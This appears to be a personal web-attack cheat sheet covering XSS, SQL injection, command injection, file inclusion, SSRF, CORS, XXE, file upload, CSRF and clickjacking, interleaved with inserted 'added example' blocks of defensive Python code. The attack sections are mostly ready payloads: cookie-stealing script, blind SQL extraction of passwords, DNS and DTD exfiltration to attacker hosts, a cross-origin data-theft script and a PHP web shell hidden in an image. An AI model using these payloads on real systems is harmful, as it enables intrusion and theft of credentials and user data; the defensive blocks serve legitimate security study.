Hassan Saad
Powered by GitBook
Web Attacks

Last updated 2 years ago

Cross-Site Scripting

  • Test every entry point (URL path, GET parameters, POST parameters, User-Agent, Cookies).

  • Submit random alphanumeric values (42424242).

  • Determine the reflection context:

    • HTML content

      • original code: <p> hello 42424242 </p>

      • payload: <img src=x onerror=alert(1)>

      • malicious code: <p> hello <img src=x onerror=alert(1)> </p>

    • Tag attribute

      • original code: <input name="test" value="42424242">

      • payload: "> <img src=x onerror=alert(1)>

      • malicious code: <input name="test" value=""> <img src=x onerror=alert(1)> ">

    • Existing JS code

      • original code: <script> user="42424242"; </script>

      • payload: "; alert(1); /*

      • malicious code: <script> user=""; alert(1); /* "; </script>

  • Test a candidate payload for example <img src=x onerror=alert(1)>

  • Test alternative payloads to bypass any filters in place.

  • Test the attack in the browser.

# XSS Payloads
<img/src=`` onerror=this.onerror=confirm(1)
<svg/onload=eval(atob(`YWxlcnQoJ1hTUycp`))>
<img src='data:'onerror=alert(0)

# Exploitation
document.location="http://127.0.0.1/"+document.cookie;
new Image().src="http://127.0.0.1/report?key="+document.cookie;
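Added example (not from the page): the three reflection contexts above, rendered with the output encoding that matches each context so the listed payloads stay inert. It assumes server-side templating in Python; the payload constants are copied from the table above as constructed test input.

```python
import html
import json

# Payloads copied from the reflection-context table above (constructed test input).
HTML_PAYLOAD = "<img src=x onerror=alert(1)>"
ATTR_PAYLOAD = '"> <img src=x onerror=alert(1)>'
JS_PAYLOAD = '"; alert(1); /*'


def render_html_content(value: str) -> str:
    """HTML-content context: <p> hello VALUE </p>. Entity-encode & < > " '."""
    return "<p> hello " + html.escape(value, quote=True) + " </p>"


def render_attribute(value: str) -> str:
    """Attribute context: value="VALUE". Always quote the attribute and encode the
    quote characters, so the value can never terminate the attribute or the tag."""
    return '<input name="test" value="' + html.escape(value, quote=True) + '">'


def render_js_string(value: str) -> str:
    """JS-string context: user="VALUE";. JSON-encode the value (handles " and \\),
    then additionally \\u-escape < > & so the string can never contain a
    literal </script> that would close the block early."""
    encoded = json.dumps(value)
    for ch in "<>&":
        encoded = encoded.replace(ch, "\\u%04x" % ord(ch))
    return "<script> user=" + encoded + "; </script>"
```

The exploitation lines above read document.cookie; a session cookie flagged HttpOnly is not exposed to script even when a payload does land.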

SQL Injection

# Finding the number of columns
' ORDER BY 4 #

# Finding which columns are reflected in the page
' UNION SELECT 1,2,3 #

# Finding the database name
' UNION SELECT version(), database(), user() #

# Finding table names through guessing
' UNION SELECT 1,2,3 FROM users #
' UNION SELECT 1,2,3 FROM posts #
' UNION SELECT 1,2,3 FROM accounts #

# Finding column names through guessing
' UNION SELECT user,2,3 FROM users #
' UNION SELECT username,2,3 FROM users #
' UNION SELECT password,2,3 FROM users #

# Finding table and column names through information_schema
' UNION SELECT table_name,2,3 FROM information_schema.tables #
' UNION SELECT column_name,2,3 FROM information_schema.columns where table_name="users" #

# If only one column is reflected, concatenate several values into it
' UNION SELECT concat(user,char(58),password),2 FROM users #

Blind SQL Injection

# Boolean Based
1' and 1=1 #
1' and 1=2 #

1' and ascii(substring(database(),1,1))>98 #
1' and ascii(substring(database(),1,1))=53 #

1' and (select 1 from users limit 0,1)=1 #
1' and (select 1 from posts limit 0,1)=1 #

1' and (select substring(concat(1,user),1,1) from users limit 0,1)=1 #
1' and (select substring(concat(1,password),1,1) from users limit 0,1)=1 #

1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))>80 #
1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))=80 #

1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))>90 #
1' and ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))=90 #

# Time Based
1' - sleep(3) #
1' and if(1=1, sleep(10), false) #

1' and if(ascii(substring(version(),1,1))>53,sleep(3),0) #
1' and if(ascii(substring(version(),1,1))=53,sleep(3),0) #

1' and if(ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),1,1))=97,sleep(10),0) #
1' and if(ascii(substring((SELECT concat(user,char(58),password) from users limit 0,1),2,1))=81,sleep(10),0) #
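Added example (not from the page) covering both the UNION section and the boolean-based blind section above: the probes run against a deliberately concatenated query on a constructed in-memory SQLite database, then against the parameterised fix. SQLite's `--` stands in for MySQL's `#` comment marker, and SQLite has no `sleep()`, so the time-based variant is not shown.

```python
import sqlite3

# Constructed in-memory stand-in for the "users" and "posts" tables the payloads guess at.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE posts (id INTEGER, title TEXT, body TEXT)")
conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
conn.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                 [(1, "hello", "first post"), (2, "news", "second post")])
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret"), (2, "bob", "hunter2")])


def lookup_post_vulnerable(post_id: str) -> list:
    """Bug: the request value is concatenated into the SQL text, so a quote
    closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT id, title, body FROM posts WHERE id = '" + post_id + "'"
    return conn.execute(sql).fetchall()


def lookup_post_safe(post_id: str) -> list:
    """Fix: a bound parameter is only ever a value, never SQL text."""
    sql = "SELECT id, title, body FROM posts WHERE id = ?"
    return conn.execute(sql, (post_id,)).fetchall()


# Page payloads rewritten for SQLite ("--" instead of "#"), as constructed input.
UNION_PROBE = "1' UNION SELECT id, user, password FROM users --"   # 3 columns, like the page
TRUE_PROBE = "1' and 1=1 --"      # row comes back: condition is evaluated
FALSE_PROBE = "1' and 1=2 --"     # row disappears: the boolean oracle the blind probes use
CHAR_PROBE = "1' and substr((select user from users limit 1), 1, 1) = 'a' --"
```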

SQLMAP

# Get Help
sqlmap -h
sqlmap -hh    # extended help

# GET parameters
sqlmap -u "URL"
sqlmap -u "URL" --cookie="COOKIE"
sqlmap -u "URL" --cookie="COOKIE" --dbs
sqlmap -u "URL" --cookie="COOKIE" -D dvwa --tables
sqlmap -u "URL" --cookie="COOKIE" -D dvwa -T users --dump

# POST parameters
sqlmap -u "URL" --cookie="COOKIE" --forms
sqlmap -u "URL" --cookie="COOKIE" --forms --dbs
sqlmap -u "URL" --cookie="COOKIE" --forms -D dvwa --tables
sqlmap -u "URL" --cookie="COOKIE" --forms -D dvwa -T users --dump

Command Injection

# Command separator / chaining characters
& , && , | , || , > , < , ;

# Normal Injection
127.0.0.1 ; whoami
127.0.0.1 & whoami
127.0.0.1 && whoami
127.0.0.1 | whoami
notfoundip || whoami

# Blind Injection
127.0.0.1 ; ping -c 10 127.0.0.1 #
127.0.0.1 & whoami > /var/www/html/whoami.txt #
127.0.0.1 & nslookup kgji2ohoyw.web-attacker.com #
127.0.0.1 & nslookup `whoami`.kgji2ohoyw.web-attacker.com #
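Added example (not from the page): a strict input check plus argv-list process execution for a ping-style lookup, showing that every chaining string listed above is rejected before any command is built. The list of attempts is copied from the page as constructed negative test input; the `ping` invocation itself is an assumption about the application.

```python
import ipaddress
import subprocess

# Every injection string from the page, used as constructed negative test input.
INJECTION_ATTEMPTS = [
    "127.0.0.1 ; whoami",
    "127.0.0.1 & whoami",
    "127.0.0.1 && whoami",
    "127.0.0.1 | whoami",
    "notfoundip || whoami",
    "127.0.0.1 ; ping -c 10 127.0.0.1 #",
    "127.0.0.1 & whoami > /var/www/html/whoami.txt #",
    "127.0.0.1 & nslookup `whoami`.kgji2ohoyw.web-attacker.com #",
]


def is_valid_host(value: str) -> bool:
    """Accept only a literal IPv4/IPv6 address. Anything carrying a separator,
    whitespace, backtick, redirection or a hostname fails to parse."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def ping_argv(value: str) -> list:
    """Build the argv list for subprocess with shell=False. The host is one
    argument and is never re-parsed by /bin/sh, so ; & | > ` are inert even
    if the validation above were ever loosened."""
    if not is_valid_host(value):
        raise ValueError("host must be a literal IP address")
    return ["ping", "-c", "1", value]


def run_ping(value: str) -> int:
    # Contrast with the bug class above: subprocess.run("ping -c 1 " + value, shell=True)
    return subprocess.run(ping_argv(value), check=False).returncode
```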

File Inclusion

filename=../../../../../../../../../etc/passwd
filename=..\..\..\..\..\..\..\..\..\windows\win.ini
filename=http://evil.com/shell.txt

# Bypass Techniques
filename=/etc/passwd
filename=....//....//....//....//....//....//etc/passwd
filename=../../../../../../etc/passwd%00.png
filename=http://evil.com/shell.txt%00
filename=HTTP://evil.com/shell.txt
filename=php://filter/resource=/etc/passwd
filename=php://filter/convert.base64-encode/resource=/etc/passwd
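Added example (not from the page): a resolver for the `filename` parameter that decodes, normalises and then anchors the path below an include root instead of stripping `../`, so each bypass string above is refused. The include root and the allowed suffixes are assumptions.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/app/pages"        # constructed include root (assumption)
ALLOWED_SUFFIXES = (".html", ".txt")   # assumption: only page templates are includable


def resolve_include(filename: str, base_dir: str = BASE_DIR):
    """Map a user-supplied filename to a path under base_dir, or return None.

    Stripping "../" once is what the ....// trick defeats; here the path is
    decoded and normalised, and the result must still lie below base_dir.
    """
    decoded = unquote(filename)                   # %00.png -> "\x00.png"
    if "\x00" in decoded:
        return None                               # null-byte truncation
    if ":" in decoded:
        return None                               # http://, HTTP://, php://filter, C:\ ...
    decoded = decoded.replace("\\", "/")          # treat Windows separators the same
    if decoded.startswith("/"):
        return None                               # absolute path such as /etc/passwd
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded))
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        return None                               # escaped the root via ../ chains
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None                               # "....//etc/passwd" stays inside but is not a page
    return candidate
```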

Open Redirection & SSRF

url=http://localhost
url=http://127.0.0.1:443
url=http://bing.com
url=http://www.company.com.evil.com
url=http://www.company.com@evil.com
url=//google.com
url=https:google.com
url=file:///etc/passwd
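Added example (not from the page): validation of a `url` parameter for the two cases above, an open redirect (exact host allowlist, no userinfo, http(s) only) and an SSRF fetch (the host must resolve to a globally routable address). The allowlist and the fake resolver used in the test are constructed assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_REDIRECT_HOSTS = {"www.company.com"}     # constructed allowlist (assumption)


def is_safe_redirect(url: str) -> bool:
    """Open-redirect check: absolute http(s) URL, no userinfo, host exactly allowlisted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False            # file:, "//google.com" (no scheme), "https:google.com" (no host)
    if parts.username is not None or parts.password is not None:
        return False            # http://www.company.com@evil.com -> real host is evil.com
    return parts.hostname in ALLOWED_REDIRECT_HOSTS   # exact match, never endswith()


def is_public_address(host: str, resolver=socket.gethostbyname) -> bool:
    """SSRF check: the host (literal or resolved) must be globally routable.
    `resolver` is injectable so the check can be exercised offline. Resolve
    once and connect to that address, or DNS rebinding can change the answer."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            addr = ipaddress.ip_address(resolver(host))
        except (OSError, ValueError, KeyError):
            return False
    return addr.is_global       # rejects loopback, RFC 1918, link-local, unspecified


def is_safe_fetch_target(url: str, resolver=socket.gethostbyname) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    return is_public_address(parts.hostname, resolver)
```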

Cross-Origin Resource Sharing

# Exploit CORS
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='http://malicious-website.com/log?key='+this.responseText;
};

# Whitelisting Null origin
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='http://malicious-website.com/log?key='+this.responseText;
};
</script> "></iframe>
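Added example (not from the page): the server-side origin handling that the two snippets above depend on, in its reflecting form next to a hardened form, plus a simplified model of the browser's credentialed-read rule. The allowed-origin set is a constructed assumption.

```python
ALLOWED_ORIGINS = {"https://app.company.com"}    # constructed allowlist (assumption)


def cors_headers_reflecting(origin):
    """The misconfiguration the snippets above exploit: whatever Origin arrives
    (including the "null" a sandboxed iframe sends) is echoed back together with
    Allow-Credentials, so any site can read the response with the victim's cookies."""
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers(origin):
    """Hardened version: exact-match allowlist, "null" never accepted, and
    Vary: Origin so a cache cannot serve one origin's response to another."""
    if origin is None or origin == "null" or origin not in ALLOWED_ORIGINS:
        return {}            # no CORS headers -> the browser withholds the body
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def cross_origin_read_allowed(headers, origin):
    """Simplified browser rule for a request sent withCredentials=true: the body is
    readable only if ACAO equals the requesting origin exactly (a '*' is refused)
    and Access-Control-Allow-Credentials is "true"."""
    return (headers.get("Access-Control-Allow-Origin") == origin
            and headers.get("Access-Control-Allow-Credentials") == "true")
```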

XML External Entity Injection

# Normal XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

# Blind XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

# Parameter XXE
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>

# Malicious DTD
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

# DTD Example
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
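Added example (not from the page): a parser for the stockCheck document above that refuses any inline DTD before parsing. Every variant listed (classic, blind, parameter entity, remote DTD) needs a DOCTYPE or ENTITY declaration, so this pre-parse guard removes the class independent of the XML library's entity settings; the numeric productId rule is an assumption about the application.

```python
import re
import xml.etree.ElementTree as ET

DTD_PATTERN = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_stock_check(document: bytes) -> str:
    """Return productId from a stockCheck document, refusing any DTD.

    A hardened parser configuration (for example defusedxml) is the second layer;
    rejecting the DTD up front means no entity, internal or external, is ever seen.
    """
    if DTD_PATTERN.search(document):
        raise ValueError("DTD declarations are not accepted")
    root = ET.fromstring(document)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    product = root.findtext("productId")
    if product is None or not product.strip().isdigit():
        raise ValueError("productId must be numeric")       # assumption: numeric ids
    return product.strip()


def is_accepted(document: bytes) -> bool:
    """True if the document parses under the rules above, False otherwise."""
    try:
        parse_stock_check(document)
        return True
    except (ValueError, ET.ParseError):
        return False


# Constructed samples: the page's classic XXE request and a benign request.
XXE_DOC = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
           b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
           b'<stockCheck><productId>&xxe;</productId></stockCheck>')
CLEAN_DOC = b'<stockCheck><productId>381</productId></stockCheck>'
```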

File Upload

# PHP one-liner, with a GIF header prepended (single quotes stop the shell expanding $_GET)
echo "GIF87a" > rce.php
echo '<?php system($_GET["cmd"]); ?>' >> rce.php

# PHP Extensions
.php
.php3
.pht
.phtml

# Double Extensions
.jpeg.php
.jpg.php
.png.php

# Change Content Type
Content-Type: image/gif
Content-Type: image/png
Content-Type: image/jpeg

# Null Byte
rce.phpD.pdf -> replace 'D' with 00 in burpsuite hex -> rce.php

# Image Bypass
exiftool -Comment='<?php system($_GET["cmd"]); ?>' shot.jpg
mv shot.jpg shot.jpg.php
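Added example (not from the page): an upload validator in which each check answers one of the bypasses listed above (null byte, alternative and double extensions, spoofed Content-Type, and a valid image header wrapped around PHP code), and the stored name is chosen by the server. The allowed types and the script-marker scan are assumptions about the application.

```python
import secrets

# Extension -> expected Content-Type, and Content-Type -> accepted magic bytes (assumption).
ALLOWED_TYPES = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
                 "png": "image/png", "gif": "image/gif"}
MAGIC = {"image/jpeg": (b"\xff\xd8\xff",),
         "image/png": (b"\x89PNG\r\n\x1a\n",),
         "image/gif": (b"GIF87a", b"GIF89a")}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return the server-chosen storage name, or None when the upload is refused."""
    if "\x00" in filename:
        return None                              # rce.php%00.pdf
    ext = filename.rpartition(".")[2].lower()    # only the LAST extension is considered
    if ext not in ALLOWED_TYPES:
        return None                              # .php .php3 .pht .phtml, shot.jpg.php
    if content_type != ALLOWED_TYPES[ext]:
        return None                              # Content-Type must agree with the extension
    if not data.startswith(MAGIC[content_type]):
        return None                              # header must match the claimed type
    if any(marker in data for marker in SCRIPT_MARKERS):
        return None                              # GIF87a<?php ... or exiftool -Comment payloads
    # The original name is discarded, so "rce.php.jpg" becomes <random>.jpg; store it
    # under a directory the web server never executes, and ideally re-encode the image.
    return secrets.token_hex(8) + "." + ext
```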

CSRF

# GET Request without Interaction
<img src="http://www.example.com/api/setusername?username=CSRFd">

# POST Request without Interaction
<form id="autosubmit" action="http://www.example.com/api/setusername" method="POST">
  <input name="username" type="hidden" value="CSRFd" />
  <input type="submit" value="Submit Request" />
</form>

<script>
  document.getElementById("autosubmit").submit();
</script>
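Added example (not from the page): the two fixes that stop both forms above, applied to a stand-in for the setusername endpoint: state changes only via POST, and only with a session-bound synchroniser token that a cross-site page cannot read. The endpoint, session ids and secret are constructed assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # constructed; in practice loaded from configuration


def issue_csrf_token(session_id: str) -> str:
    """Nonce plus HMAC over (session, nonce): embed in every state-changing form.
    Same-origin policy keeps the token out of reach of the attacker's page."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, _, mac = token.partition(".")
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_set_username(session_id: str, method: str, form: dict) -> str:
    """Stand-in for /api/setusername with both CSRF fixes applied."""
    if method != "POST":
        return "405 method not allowed"               # defeats the <img src=...> GET variant
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "403 missing or invalid CSRF token"    # defeats the auto-submitted form
    # A SameSite=Lax/Strict session cookie is the complementary browser-side control.
    return "200 username set to " + form["username"]
```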

Click-Jacking

<style>
   iframe {
       position: relative;
       width: 500px;
       height: 700px;
       opacity: 0.5;
       z-index: 2;
   }
   button {
       position: absolute;
       top: 300px;
       left: 60px;
       z-index: 1;
   }
</style>

<button type="button">Click Me!</button>

<iframe src="https://vulnerable-website.net/account"></iframe>

Authentication & Session Vulnerabilities

  1. Testing for Credentials Transported over an Encrypted Channel

  2. Testing for Default Credentials

  3. Testing for Weak Lock Out Mechanism

  4. Testing for Bypassing Authentication Schema

  5. Testing for Vulnerable Remember Password

  6. Testing for Browser Cache Weaknesses

  7. Testing for Weak Password Policy

  8. Testing for Weak Security Question Answer

  9. Testing for Weak Password Change or Reset Functionalities

  10. Testing for Weaker Authentication in Alternative Channel

  11. Testing for Session ID Predictability and Randomness

  12. Testing for Secure Cookies Attributes

  13. Testing for Exposed Session Variables

Access Control Vulnerabilities

Vertical privilege escalation

If a user can gain access to functionality that they are not permitted to access then this is vertical privilege escalation. For example, if a non-administrative user can in fact gain access to an admin page where they can delete user accounts, then this is vertical privilege escalation.

# URL Based
https://insecure-website.com/admin

# Parameter Based
https://insecure-website.com/login/home.jsp?admin=true
https://insecure-website.com/login/home.jsp?role=1

Horizontal privilege escalation (IDOR)

Horizontal privilege escalation arises when a user is able to gain access to resources belonging to another user, instead of their own resources of that type. For example, if an employee should only be able to access their own employment and payroll records, but can in fact also access the records of other employees, then this is horizontal privilege escalation.

https://insecure-website.com/myaccount?id=123 // access data of user one
https://insecure-website.com/myaccount?id=124 // access data of user two

https://insecure-website.com/customer_account?customer_number=132355 //john's data
https://insecure-website.com/customer_account?customer_number=132356 //wick's data
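Added example (not from the page): server-side checks for the two cases above. The horizontal check ties each customer_account record to its owner, and the vertical check takes the role from the server-side session so ?admin=true and ?role=1 are ignored. The users, roles and records are constructed data.

```python
# Constructed users and records standing in for the insecure-website.com examples above.
USERS = {"john": "user", "wick": "user", "alice": "admin"}   # name -> role, held server-side
CUSTOMER_ACCOUNTS = {132355: {"owner": "john", "balance": 120},
                     132356: {"owner": "wick", "balance": 75}}


class Forbidden(Exception):
    """Raised for any access the session user is not entitled to."""


def customer_account(session_user: str, customer_number: int) -> dict:
    """Horizontal control: the record must be owned by the session user.
    Missing and foreign records produce the same error, so the endpoint cannot be
    used to enumerate which customer_number values exist."""
    record = CUSTOMER_ACCOUNTS.get(customer_number)
    if record is None or record["owner"] != session_user:
        raise Forbidden(f"{session_user} may not read account {customer_number}")
    return record


def admin_home(session_user: str, query_params: dict) -> str:
    """Vertical control: the role comes from the server-side session, never from
    the query string, so ?admin=true or ?role=1 changes nothing."""
    if USERS.get(session_user) != "admin":
        raise Forbidden(f"{session_user} is not an administrator")
    return "admin home"


def allowed(view, *args) -> bool:
    """True if the view grants access, False if it raises Forbidden."""
    try:
        view(*args)
        return True
    except Forbidden:
        return False
```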

For all types of SQL databases, see the SQL injection cheat sheet.